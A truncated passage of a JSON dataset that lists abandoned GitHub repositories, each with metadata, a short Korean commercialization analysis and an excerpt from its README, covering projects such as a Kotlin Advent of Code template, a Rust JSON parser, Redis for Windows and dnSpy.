참여하는 프로그래밍 챌린지의 완전한 풀이 모음으로, 학습자와 교육자에게 즉시 활용 가능한 레퍼런스 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: 프로그래밍 학습 플랫폼에서 \"문제 풀이 강좌\" 구독 서비스 (월 $9.99 ~ $29.99)\n2. **내부","readme_excerpt":"# AdventOfCode2021\n\nWelcome to the Advent of Code[^aoc] Kotlin project created by [elizarov][github] using the [Advent of Code Kotlin Template][template] delivered by JetBrains.\n\nIn this repository, elizarov is about to provide solutions for the puzzles using [Kotlin][kotlin] language.\n\nIf you stuck with Kotlin-specific questions or anything related to this template, check out the following resources:\n\n- [Kotlin docs][docs]\n- [Kotlin Slack][slack]\n- Template [issue tracker][issues]\n\n\n[^aoc]:\n    [Advent of Code][aoc] – an annual event in December since 2015.\n    Every year since then, with the first day of December, a programming puzzles contest is published every day for twenty-four days.\n    A set of Christmas-oriented challenges provide any input you have to use to answer using the language of your choice.\n\n[aoc]: https://adventofcode.com\n[docs]: https://kotlinlang.org/docs/home.html\n[github]: https://github.com/elizarov\n[issues]: https://github.com/kotlin-hands-on/advent-of-code-ko","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"togatoga/monkey-json","github_url":"https://github.com/togatoga/monkey-json","stars":5,"language":"Rust","license":"MIT","abandonment_months":42,"description":"# monkey-json 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 쉽게 다루는 도구로, 프로그래머가 아닌 사람도 데이터 변환 작업을 간단하게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 엑셀이나 CSV 파일을 자동으로 다른 형식으로 변환해주는 온라인 도구\n2. **내부 업무 도구**: 대기업의 서로 다른 시스템 간에 데","readme_excerpt":"# monkey-json\n\n[RustでJSONパーサーをフルスクラッチで実装する](https://qiita.com/togatoga/items/9d600e20325775f09547)\n\n`monkey-json` project is just for fun. I want to write JSON parser from the scratch.  \nThe implementation of `monkey-json` conforms to [RFC8259](https://www.rfc-editor.org/rfc/rfc8259) as possible as I can.  \nI disregarded some rules on [RFC8259](https://www.rfc-editor.org/rfc/rfc8259). Because It's super boring to keep consistency with them(especially `Number`).  \n\nYou can use `monkey-json` as a command line tool(`mj`).\n\n## mj\n\n`mj` is a command line JSON minimum prettier like [`jq` ](https://github.com/stedolan/jq).\n\n![Alt Text](https://raw.githubusercontent.com/togatoga/monkey-json/main/demo.gif)\n\n\n### install\n```bash\ncargo install --git https://github.com/togatoga/monkey-json\n```\n\n### How to\n\n```bash\n% mj --help                                                       \nmj - command line JSON minimum prettier\nUSAGE:\n      mj [OPTIONS...] [FILE] [OPTIONS...]\nARGS:\n     <FILE> A JSON file\n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"wcerfgba/catalogue_of_chords","github_url":"https://github.com/wcerfgba/catalogue_of_chords","stars":7,"language":"Clojure","license":"unknown","abandonment_months":65,"description":"# wcerfgba/catalogue_of_chords 분석\n\n## 왜 보물인가\n음악을 배우는 사람들이 기타, 피아노 등 악기의 화음(코드)을 쉽게 찾아볼 수 있는 종합 자료실입니다.\n\n## 어디에 쓸 수 있나\n1. **음악 학습 SaaS**: 악기 초보자가 월 5,000원대에 코드를 검색하고 영상으로 배우는 구독 서비스\n2. **음악 앱 API 판매**:","readme_excerpt":"# Catalogue of Chords\n\n`catalogue.txt` contains a catalogue of every named three to six note chord which can be constructed by stacking intervals from semitones to fourths, and each following chord that the voicing can move to by shifting each note up or down by up to three semitones.\n\nEach chord contains an entry such as the following:\n\n```\n                                                      m    M    m\n.min7.                                             .r   b3    5   b7.\n\n  .   .   .   .                 I  min7             r   b3    5   b7\n                            +bIII  Maj6             6    r    3    5\n  x   .   .   .                 I  Maj                   r    3    5\n  .   .   .   x                 I  min              r   b3    5\n                            +bIII  Maj6             6    r    3\n -1   .   .   .              -bII  augMaj7          r    3   #5    7\n  .  -1   .   .               +II  7sus4b13        b7    r    4  b13\n                            +bVII  Maj6/9     ","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"asimokby/acikhack-Room2130","github_url":"https://github.com/asimokby/acikhack-Room2130","stars":5,"language":"Python","license":"MIT","abandonment_months":79,"description":"# acikhack-Room2130 보물 분석\n\n## 왜 보물인가\n2019년 개발된 오픈소스 프로젝트로, 커뮤니티 지지(5스타)를 받았으나 현재 유지보수가 중단되어 있어 저비용으로 인수 및 상용화할 기회가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **행사/회의 관리 SaaS**: 방 배치, 일정 관리, 참석자 매칭 등을 자동화하는 구독형 서비스로 전환\n2","readme_excerpt":"# Product Comment Summarizer\n\nExtracting most commonly occuring bigrams from most positive and most negative comments for a product.\n\n## The problem\n\nThe company often needs to know what specific topics their customers are talking about, whether this be good or bad. However, going through all comments of the customers is inefficient. \n\n\n## The solution\n\nFind the most common recurring phrases among the good comments and the bad comments and present it. Therefore, a company won’t have to read all customers’ comments.\n\n\n## Our approach\n\nFirst we created a scraper that extracts all comments from a product's webpage. Then, we used a bigram collocation finder model to find the most commonly recurring bigrams in all the comments that had one star. Then, we did the same with all the comments with five stars. We created a user-friendly GUI that presents all of the results.\nThe GUI is in \"comment feedback.py\".\n\n## What is next?\n\nBigrams in comments having to do with urgent issues can be found an","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"pearofducks/femtoTween","github_url":"https://github.com/pearofducks/femtoTween","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":43,"description":"# femtoTween 상용화 분석\n\n## 왜 보물인가\n복잡한 움직임 효과를 간단하게 만들어주는 소형 도구로, 웹사이트와 앱의 사용자 경험을 훨씬 부드럽고 매력적으로 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **UI 애니메이션 SaaS**: 코딩 없이 웹사이트에 움직이는 효과를 추가할 수 있는 드래그앤드롭 빌더 서비스\n2. **게임 개발 도구**","readme_excerpt":"> femtoTween\n\nfemtoTween's goal is to provide just enough tweening functionality to cover basic use cases.\nThrough this primary goal, it should also be one of the smallest tweening libraries (less than 1k un-minified even).\n\n```\nyarn add femtotween\nimport { tween } from 'femtotween'\n```\n\n- Minimal API can be grok'd in seconds\n- Supports a `done` callback - especially useful for [Vue.js transitions via JS hooks](https://vuejs.org/v2/guide/transitions.html#JavaScript-Hooks)\n- Supports and provides additional easing functions\n\n##### more\n\n[see site for example and API](https://pearofducks.github.io/femtoTween/)\n\n##### bundling & production\n\nIf you're shipping to es5 environments, you'll need to either:\n\n- source the es5-browser-build :: e.g. `import { tween } from 'femtotween/dist/femtoTween.umd.js'`\n- or enable transpiling of `.esm.js` files in your bundler\n\nThis module ships es6 module _and_ code in the `femtoTween.esm.js` file - both for convenience to those shipping more modern builds","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"nrslib/cfg","github_url":"https://github.com/nrslib/cfg","stars":5,"language":"PHP","license":"MIT","abandonment_months":79,"description":"# nrslib/cfg 저장소 분석\n\n## 왜 보물인가\n설정 파일을 자동으로 관리해주는 작은 유틸리티로, 프로그래머들이 반복적인 작업을 줄일 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션이 여러 환경(개발/운영)에서 설정을 자동 적용하는 기능\n2. **내부 업무 도구**: 회사 시스템들이 공통 설정을 중앙에서","readme_excerpt":"# cfg\r\nClass File Generator\r\n\r\n# Quick Examples\r\n\r\n```\r\nuse nrslib\\Cfg\\ClassRenderer;\r\nuse nrslib\\Cfg\\Meta\\Classes\\ClassMeta;\r\n\r\n$meta = new ClassMeta('MyTestClass', 'nrslib');\r\n$renderer = new ClassRenderer();\r\necho $renderer->render($meta);\r\n```\r\n\r\n# Setup\r\n\r\n## Class\r\n\r\n### Class\r\n\r\n```\r\n$meta = new ClassMeta('MyTestClass', 'nrslib');\r\n$meta->setupClass()\r\n    ->addUse('nrslib\\Cfg\\ClassRenderer')\r\n    ->addUse('nrslib\\Cfg\\Meta\\Classes\\ClassMeta')\r\n    ->setExtend('SuperClass')\r\n    ->addImplement('MyInterface')\r\n    ->addImplement('MyInterface2')\r\n    ->setConstructor(function ($define) {\r\n        $define\r\n            ->addArgument('renderer', 'ClassRenderer')\r\n            ->addBody('$this->renderer = $renderer;')\r\n            ->addArgument('meta', 'ClassMeta')\r\n            ->addBody('$this->meta = $meta;');\r\n    });\r\n```\r\n\r\n### Fields\r\n\r\n```\r\n$meta = new ClassMeta('MyTestClass', 'nrslib');\r\n$meta->setupFields()\r\n    ->addField('testField', 'string')\r\n    ->addField('testField2', 's","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"taboola/ScORe","github_url":"https://github.com/taboola/ScORe","stars":7,"language":"Java","license":"MIT","abandonment_months":39,"description":"# taboola/ScORe 분석 보고서\n\n## 왜 보물인가\n점수 매기기와 순위 정렬 문제를 빠르고 정확하게 해결하는 알고리즘으로, 데이터 분석이 필요한 모든 비즈니스에서 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **추천 서비스 SaaS**: 전자상거래 플랫폼에서 사용자 관심도에 따라 상품을 자동으로 순위 매기고 추천하는 기능\n2. **검","readme_excerpt":"# ScORe by Taboola\n\nScORe is a java library for effective schema pruning when reading nested data structures. \nBack in 2018 we've identified that our spark jobs are reading more data than they need to ingest, not leveraging parquet columnar format that support reading partial schema of nested columns. The impact of such reduction was evident also in resource utilization and resulted in much low execution times.\n\nThis issue is documented in notorious [SPARK-4502](https://issues.apache.org/jira/browse/SPARK-4502), which at that time did not seem close to resolution. As spark issue was finally (partially) resolved, we were already running with ScORe in production for several months, reducing up to 95% of input size for spark sql queries which involves highly nested data structures, with structs, arrays and maps interwoven together.\n\nScORe traverse the logical plan of the query, determines the schema that is required for running the query, and then we re-create the query using the generate","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"nrslib/clarc-php-core","github_url":"https://github.com/nrslib/clarc-php-core","stars":5,"language":"PHP","license":"MIT","abandonment_months":79,"description":"# clarc-php-core 상용화 분석\n\n## 왜 보물인가\n웹사이트 개발에 필요한 기본 기능들을 미리 만들어둔 도구라서, 개발자들이 처음부터 다시 만들 필요 없이 빠르게 프로젝트를 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **소규모 웹사이트 구축 SaaS**: 사용자가 코딩 없이 웹사이트를 만들 수 있는 플랫폼에 백엔드 기술로 활용\n2. *","readme_excerpt":"","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"MBMIT/neurolab-hardware","github_url":"https://github.com/MBMIT/neurolab-hardware","stars":5,"language":"","license":"Apache-2.0","abandonment_months":92,"description":"# MBMIT/neurolab-hardware 분석\n\n## 왜 보물인가\n뇌파를 감지하는 오픈소스 하드웨어로, 의료·교육·게임 분야에서 새로운 인터페이스를 만들 수 있는 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **집중력 측정 SaaS**: 학생/직장인의 집중도를 실시간으로 추적하고 개선 보고서를 제공하는 구독 서비스\n2. **재활 훈련 도구**: ","readme_excerpt":"# Neurolab Hardware\n\nThe Neurolab project is inspired by Open Source Neuro devices such as Brainduino. We are developing a completely new device as a headband with integrated electronics. This repository holds the PCB schematics and layouts for the Neurolab Hardware. \n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"ramsey/php-rfcs","github_url":"https://github.com/ramsey/php-rfcs","stars":5,"language":"PHP","license":"MIT","abandonment_months":32,"description":"# ramsey/php-rfcs 분석\n\n## 왜 보물인가\nPHP 언어 개선 제안서들을 체계적으로 관리하는 저장소로, PHP 커뮤니티의 표준화된 의사결정 과정을 투명하게 기록한 귀중한 지식 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **PHP 개발사 교육 플랫폼**: 프로그래머들이 언어 발전 과정을 배우는 실습 교재로 활용\n2. **개발팀 의사결정 도구**","readme_excerpt":"PHP RFC Experiment\n==================\n\nExperiment to move RFC discussions to GitHub. A pull request with the proposal is submitted against\nthis repository and then merged if the RFC is accepted. Among other things, this allows inline\ncomments on RFCs.\n\nThis is just a one-off experiment for now, we'll have to discuss whether we want to move the RFC\nprocess towards this separately. This repository may be abandoned. Please don't submit PRs for now.\n","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"rbuckton/proposal-regexp-features","github_url":"https://github.com/rbuckton/proposal-regexp-features","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":58,"description":"# rbuckton/proposal-regexp-features 분석\n\n## 왜 보물인가\n텍스트 검색과 데이터 처리를 더 강력하고 유연하게 만드는 기술 표준안으로, 향후 프로그래밍 언어의 핵심 기능이 될 가능성이 높습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 데이터 검증 서비스**: 고객이 입력한 이메일, 전화번호, 주소 등을 정확하게 검증하는 온","readme_excerpt":"<!--#region:intro-->\n# ECMAScript Regular Expression Language Features\n\nThis seeks to investigate and introduce new features to the ECMAScript `RegExp` object based on features available commonly in other languages.\n\n<!--#endregion:intro-->\n\n<!--#region:status-->\n## Status\n\n**Stage:** 0  \n**Champion:** Ron Buckton (@rbuckton)  \n\n_For detailed status of this proposal see [TODO](#todo), below._\n<!--#endregion:status-->\n\n<!--#region:authors-->\n## Authors\n\n* Ron Buckton ([@rbuckton](https://github.com/rbuckton))\n<!--#endregion:authors-->\n\n<!--#region:motivations-->\n# Motivations\n\nECMAScript regular expressions have slowly improved over the years to adopt new functionality commonly present in other languages, including:\n\n- Unicode Support\n- Named Capture Groups\n- Match Indices\n\nHowever, a large majority of other languages and libraries have a common set of features that ECMAScript regular expressions currently lack.\nSome of these features improve performance in degenerative cases such as ba","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"mafintosh/washi-tape","github_url":"https://github.com/mafintosh/washi-tape","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":58,"description":"# washi-tape 프로젝트 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 이미지와 텍스트를 마치 물리적인 종이에 붙인 것처럼 자연스럽게 배치할 수 있는 디자인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 직접 콜라주나 스크랩북을 만드는 온라인 디자인 플랫폼\n2. **내부 업무 도구**: 팀의 아이디어를 보드에 자유롭게 배","readme_excerpt":"# washi-tape\n\nWashi Tape makes a test planner from a Tape instance that makes it easy to plan and await parts of your tests.\n\n```\nnpm install washi-tape\n```\n\n## Usage\n\n``` js\nconst net = require('net')\nconst tape = require('tape')\nconst plan = require('washi-tape')\n\ntape('some test', async function (t) {\n  // make a new test instance that requires 3 asserts\n  const serverTest = plan(t, 3)\n\n  // do something async and call the required assertions\n  const server = net.createServer(function (socket) {\n    serverTest.pass('got socket')\n    socket.once('data', function (data) {\n      serverTest.ok(data instanceof Buffer)\n      socket.end()\n    })\n  })\n\n  server.listen(10000, () => {\n    const s = net.connect(10000)\n    s.end('hello world', function () {\n      serverTest.pass('client socket finished')\n    })\n  })\n\n  // wait for the server assertions to finish\n  await serverTest\n\n  // two assertions afterwards\n  const serverClose = plan(t, 2)\n\n  server.on('close', function () {\n    serverClos","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"cjrh/coroexecutor","github_url":"https://github.com/cjrh/coroexecutor","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":46,"description":"# coroexecutor 상용화 분석\n\n## 왜 보물인가\n복잡한 작업을 동시에 여러 개 처리할 때 컴퓨터 성능을 최대한 효율적으로 사용하게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 API 서비스**: 수천 명의 사용자 요청을 동시에 처리하는 웹 서버 백엔드로 제공\n2. **실시간 데이터 처리 SaaS**: 금융 거래, 센서 ","readme_excerpt":".. image:: https://github.com/cjrh/coroexecutor/workflows/Python%20application/badge.svg\n    :target: https://github.com/cjrh/coroexecutor/actions\n\n.. image:: https://img.shields.io/badge/stdlib--only-yes-green.svg\n    :target: https://img.shields.io/badge/stdlib--only-yes-green.svg\n\n.. image:: https://coveralls.io/repos/github/cjrh/coroexecutor/badge.svg?branch=master\n    :target: https://coveralls.io/github/cjrh/coroexecutor?branch=master\n\n.. image:: https://img.shields.io/pypi/pyversions/coroexecutor.svg\n    :target: https://pypi.python.org/pypi/coroexecutor\n\n.. image:: https://img.shields.io/github/tag/cjrh/coroexecutor.svg\n    :target: https://img.shields.io/github/tag/cjrh/coroexecutor.svg\n\n.. image:: https://img.shields.io/badge/install-pip%20install%20coroexecutor-ff69b4.svg\n    :target: https://img.shields.io/badge/install-pip%20install%20coroexecutor-ff69b4.svg\n\n.. image:: https://img.shields.io/pypi/v/coroexecutor.svg\n    :target: https://img.shields.io/pypi/v/coroexecutor.s","composite_score":0.5001,"license_safety_tag":"safe"},{"name":"aphrx/py_painter","github_url":"https://github.com/aphrx/py_painter","stars":5,"language":"Python","license":"unknown","abandonment_months":55,"description":"# py_painter 상용화 분석\n\n## 왜 보물인가\n파이썬이라는 프로그래밍 언어로 그림을 그리거나 이미지를 자동으로 만들 수 있는 도구로, 디자인 작업을 코딩으로 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 소셜미디어 이미지 자동 생성 서비스 (인스타그램 배너, 썸네일 등을 규칙에 따라 자동 제작)\n2. **","readme_excerpt":"# PyPainter\n\n## Execution\nMake sure you have Python3 installed on your machine and a Windows PC with paint. This can work with other drawing apps but will probably need a bit more modification.\n\nThis script should work out of the box for a machine with a resolution of 1920x1080 given that paint is fullscreen. Otherwise, there are certain coordinates marked in the script that will need to be changed. Commenting out the while loop in the __main__ function should help you determine the coordinates. Make sure the pen tool is already selected in paint prior to execution.\n\nTo execute the project, run:\n```\npip install -r requirements.txt\npython script.py\n```\n\nIf there are any issues, reach out to the discord: https://discord.gg/nTRJ6emeeS\n\nP.S. During execution, the script will have control of the mouse. To force the script to end, force your cursor to the top-right corner of the screen.\n","composite_score":0.5001,"license_safety_tag":"unknown"},{"name":"songrotek/Deep-Learning-Papers-Reading-Roadmap","github_url":"https://github.com/songrotek/Deep-Learning-Papers-Reading-Roadmap","stars":12,"language":"Python","license":"unknown","abandonment_months":43,"description":"# Deep-Learning-Papers-Reading-Roadmap 분석\n\n## 왜 보물인가\n인공지능를 배우고 싶은 학생과 직장인들이 어떤 논문부터 읽어야 할지 알 수 있는 학습 지도를 정리해둔 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 플랫폼**: 온라인 강의 사이트에서 \"논문 학습 커리큘럼\" 섹션으로 제공해 수강생들이 체계적으로 배우도","readme_excerpt":"# Deep Learning Papers Reading Roadmap\n\n>If you are a newcomer to the Deep Learning area, the first question you may have is \"Which paper should I start reading from?\"\n\n>Here is a reading roadmap of Deep Learning papers!\n\nThe roadmap is constructed in accordance with the following four guidelines:\n\n- From outline to detail\n- From old to state-of-the-art\n- from generic to specific areas\n- focus on state-of-the-art\n\nYou will find many papers that are quite new but really worth reading.\n\nI would continue adding papers to this roadmap.\n\n\n---------------------------------------\n\n# 1 Deep Learning History and Basics\n\n## 1.0 Book\n\n**[0]** Bengio, Yoshua, Ian J. Goodfellow, and Aaron Courville. \"**Deep learning**.\" An MIT Press book. (2015). [[html]](http://www.deeplearningbook.org/) **(Deep Learning Bible, you can read this book while reading following papers.)** :star::star::star::star::star:\n\n## 1.1 Survey\n\n**[1]** LeCun, Yann, Yoshua Bengio, and Geoffrey Hinton. \"**Deep learning**.\" Nature","composite_score":0.5,"license_safety_tag":"unknown"},{"name":"MicrosoftArchive/redis","github_url":"https://github.com/MicrosoftArchive/redis","stars":9,"language":"C","license":"NOASSERTION","abandonment_months":83,"description":"# Redis 저장소 분석\n\n## 왜 보물인가\n마이크로소프트가 아카이브한 Redis는 전 세계 수백만 개 웹서비스의 '초고속 메모리 창고' 역할을 하는 핵심 기술로, 데이터 처리 속도가 일반 데이터베이스보다 수십 배 빠릅니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 채팅 앱, 온라인 게임 점수 시스템 같이 초고속 응답이 필요한 웹 서","readme_excerpt":"[![Windows Status](http://img.shields.io/appveyor/ci/MSOpenTech-lab/redis.svg?style=flat-square)](https://ci.appveyor.com/project/MSOpenTech-lab/redis) [![NuGet version](http://img.shields.io/nuget/v/redis-64.svg?style=flat-square)](http://www.nuget.org/packages/redis-64/) [![Chocolatey version](http://img.shields.io/chocolatey/v/redis-64.svg?style=flat-square)](http://www.chocolatey.org/packages/redis-64/) [![Chocolatey downloads](http://img.shields.io/chocolatey/dt/redis-64.svg?style=flat-square)](http://www.chocolatey.org/packages/redis-64/)\n\nThis project is no longer being actively maintained. If you are looking for a Windows version of Redis, you may want to check out [Memurai](https://www.memurai.com/). Please note that Microsoft is not officially endorsing this product in any way.\n\n## Redis on Windows \n\n- This is a port for Windows based on [Redis](https://github.com/antirez/redis).\n- We officially support the 64-bit version only. Although you can build the 32-bit version from s","composite_score":0.5,"license_safety_tag":"unknown"},{"name":"julycoding/The-Art-Of-Programming-By-July","github_url":"https://github.com/julycoding/The-Art-Of-Programming-By-July","stars":10,"language":"C","license":"unknown","abandonment_months":39,"description":"# julycoding/The-Art-Of-Programming-By-July 분석\n\n## 왜 보물인가\n프로그래밍의 핵심 개념을 체계적으로 정리한 교육 자료로, 비전공자도 단계별로 프로그래밍 논리를 배울 수 있는 학습 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 초급자 대상 프로그래밍 강좌 구독 서비스로 운영\n2. **기업 내부","readme_excerpt":"## 程序员编程技艺(原编程艺术系列，脱胎于微软面试100题系列，后成书为编程之法)\n\n看过[结构之法算法之道blog](http://blog.csdn.net/v_july_v)的朋友可能知道，从2010年10月起，[July](http://weibo.com/julyweibo) 开始整理一个微软面试100题的系列，他在整理这个系列的过程当中，越来越强烈的感觉到，可以从那100题中精选一些更为典型的题，每一题详细阐述成章，不断优化，于此，便成了程序员编程艺术系列。\n\n原编程艺术系列从2011年4月至今，写了42个编程问题，在创作的过程当中，得到了很多朋友的支持，特别是博客上随时都会有朋友不断留言，或提出改进建议，或show出自己的思路、代码，或指正bug。为更好的改进、优化、增补编程艺术系列，特把博客上的这个**程序员编程艺术系列和博客内其它部分经典文章**同步到此，成立本项目，最后成书为：《编程之法：面试和算法心得》。\n\n若发现任何问题、错误、bug，或可以优化的每一段代码，欢迎随时pull request或发issue反馈，thanks。\n\nupdate\n\n2023年2.4日July更新：这本编程之法，17-19年就特别想出修订版，但奈何当时各种事情实在是太多，顾不上来，是个遗憾，今年要弥补此前遗憾，出第二版，相比第一版将：\n- 1 重写1/3的内容，且再度review所有代码、所有公式全部用LaTeX重新编辑一遍、删减个别内容\n- 2 新增1/3的新题，从七月在线于2021年Q2至2023年Q2整理的过去两年的最新大厂面试题中精选20道数据结构/算法和AI相关的新题\n- 3 新增部分机器学习技术，比如xgboost CNN RNN LSTM等\n\n有意参与读者审阅的欢迎随时联系我\n\n另，还在谋划4本新书，类似：\n- ChatGPT背后技术拆解，包括且不限于：1 微积分/概率统计基础、2 ML与最优化基础损失函数/梯度上升、3 RL/RLHF与TRPO/PPO算法、4 transformer/自注意力机制、5 GPT-N/prompt学习、6 chatgpt训练三阶段及多轮对话等工程细节、7 chatgpt在各行各业的应用\n- 机器学习通俗笔记\n- RL极简入门\n- AI数学基础入门\n\n未来三年逐一出版\n\n## Contact me\nJuly个人微博：ht","composite_score":0.5,"license_safety_tag":"unknown"},{"name":"sqshq/PiggyMetrics","github_url":"https://github.com/sqshq/PiggyMetrics","stars":7,"language":"Java","license":"mit","abandonment_months":25,"description":"# PiggyMetrics 상용화 분석\n\n## 왜 보물인가\n개인의 수입과 지출을 자동으로 추적하고 분석해주는 가계부 앱으로, 누구나 쉽게 자신의 재정 상태를 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독료를 받고 개인 사용자들에게 클라우드 기반 가계부 서비스 제공\n2. **내부 업무 도구**: 소규모 금융회사나 회계","readme_excerpt":"[![Build Status](https://travis-ci.org/sqshq/PiggyMetrics.svg?branch=master)](https://travis-ci.org/sqshq/PiggyMetrics)\n[![codecov.io](https://codecov.io/github/sqshq/PiggyMetrics/coverage.svg?branch=master)](https://codecov.io/github/sqshq/PiggyMetrics?branch=master)\n[![GitHub license](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/sqshq/PiggyMetrics/blob/master/LICENCE)\n[![Join the chat at https://gitter.im/sqshq/PiggyMetrics](https://badges.gitter.im/sqshq/PiggyMetrics.svg)](https://gitter.im/sqshq/PiggyMetrics?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n# Piggy Metrics\n\nPiggy Metrics is a simple financial advisor app built to demonstrate the [Microservice Architecture Pattern](http://martinfowler.com/microservices/) using Spring Boot, Spring Cloud and Docker. The project is intended as a tutorial, but you are welcome to fork it and turn it into something else!\n\n<br>\n\n![](https://cloud.githubusercontent.com/assets/606","composite_score":0.5,"license_safety_tag":"safe"},{"name":"SheetJS/js-xlsx","github_url":"https://github.com/SheetJS/js-xlsx","stars":10,"language":"","license":"apache-2.0","abandonment_months":26,"description":"# SheetJS/js-xlsx 상용화 분석\n\n## 왜 보물인가\n엑셀·구글시트 같은 스프레드시트 파일을 웹브라우저에서 직접 읽고 쓸 수 있게 해주는 도구로, 많은 비즈니스 애플리케이션에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 급여 관리 클라우드 서비스에서 고객이 엑셀 파일로 직원 정보를 대량 업로드할 때\n- 웹기반 재무관","readme_excerpt":"> [!IMPORTANT]\n> ### Thank you Clippy!\n> \n> ### But our Sheet is in another Workbook!\n>\n> The new source repository URL is <https://git.sheetjs.com/sheetjs/sheetjs>.\n> **SheetJS CE remains _truly open source_ under the Apache 2.0 License.**\n>\n> Issues should be raised at <https://git.sheetjs.com/sheetjs/sheetjs/issues>.\n> Users can register directly or sign in with a valid GitHub account. Issues can\n> also be raised at <https://sheetjs.com/chat>.\n>\n> Documentation is available at <https://docs.sheetjs.com>.\n>\n> Scripts and NodeJS modules are available at <https://cdn.sheetjs.com>.\n>\n> The [`master` branch](https://github.com/sheetjs/sheetjs/tree/master) branch\n> of the `SheetJS/sheetjs` repository on GitHub includes all commits through\n> `515d1c6f2e1d3ca422ee9198b177cfd926434936`.\n\nThe SheetJS Community Edition offers battle-tested open-source solutions for\nextracting useful data from almost any complex spreadsheet and generating new\nspreadsheets that will work with legacy and modern s","composite_score":0.5,"license_safety_tag":"safe"},{"name":"helm/charts","github_url":"https://github.com/helm/charts","stars":7,"language":"Go","license":"apache-2.0","abandonment_months":52,"description":"# helm/charts 저장소 분석\n\n## 왜 보물인가\n클라우드 서버 관리를 자동화해주는 오픈소스 도구 모음으로, 기술팀의 반복 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 멀티테넌트 고객사들의 서버 환경을 한 번에 관리하고 배포하는 자동화 플랫폼\n2. **내부 업무 도구**: 대규모 기업의 IT팀이 수백 개 ","readme_excerpt":"|![](https://upload.wikimedia.org/wikipedia/commons/thumb/1/17/Warning.svg/156px-Warning.svg.png) | This project is no longer supported.\n|---|---|\n\n# Helm Charts\n\nThe canonical source for Helm charts is the [Artifact Hub](https://artifacthub.io), an aggregator for distributed chart repos.\n\nThis GitHub project is the source for Helm `stable` and `incubator` [Helm chart repositories](https://v3.helm.sh/docs/topics/chart_repository/). This is now an archive no longer under active development.\n\nFor more information about installing and using Helm, see the\n[Helm Docs](https://helm.sh/docs/). For a quick introduction to Charts, see the [Chart Guide](https://helm.sh/docs/topics/charts/).\n\n## ⚠️ Deprecation and Archive Notice\n\nSimilar to the [Helm 2 Support Plan](https://helm.sh/blog/2019-10-22-helm-2150-released/#helm-2-support-plan), this GitHub project has begun transition to a 1 year \"maintenance mode\" (see [Deprecation Timeline](#deprecation-timeline) below). Given the deprecation plan, t","composite_score":0.5,"license_safety_tag":"safe"},{"name":"0xd4d/dnSpy","github_url":"https://github.com/0xd4d/dnSpy","stars":7,"language":"C#","license":"unknown","abandonment_months":66,"description":"# 0xd4d/dnSpy 분석 보고서\n\n## 왜 보물인가\n프로그램의 숨겨진 코드를 분석하고 이해할 수 있는 전문 도구로, 소프트웨어 보안 업계와 개발자들 사이에서 필수적인 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 소프트웨어 보안 검사 자동화 플랫폼 제공\n2. **내부 업무 도구**: 회사 프로그램의 무단 변조 감지 및","readme_excerpt":"# dnSpy - [Latest release](https://github.com/dnSpy/dnSpy/releases)\n\ndnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available. Main features:\n\n- Debug .NET and Unity assemblies\n- Edit .NET and Unity assemblies\n- Light and dark themes\n\nSee below for more features\n\n![debug-animated](images/debug-animated.gif)\n\n![edit-code-animated](images/edit-code-animated.gif)\n\n## Binaries\n\nhttps://github.com/dnSpy/dnSpy/releases\n\n## Building\n\n```PS\ngit clone --recursive https://github.com/dnSpy/dnSpy.git\ncd dnSpy\n# or dotnet build\n./build.ps1 -NoMsbuild\n```\n\nTo debug Unity games, you need this repo too: https://github.com/dnSpy/dnSpy-Unity-mono (or get the binaries from https://github.com/dnSpy/dnSpy/releases/unity)\n\n# Debugger\n\n- Debug .NET Framework, .NET and Unity game assemblies, no source code required\n- Set breakpoints and step into any assembly\n- Locals, watch, autos windows\n- Variables windows support saving vari","composite_score":0.5,"license_safety_tag":"unknown"},{"name":"googlehosts/hosts","github_url":"https://github.com/googlehosts/hosts","stars":10,"language":"","license":"NOASSERTION","abandonment_months":26,"description":"","readme_excerpt":"# GoogleHosts\n## 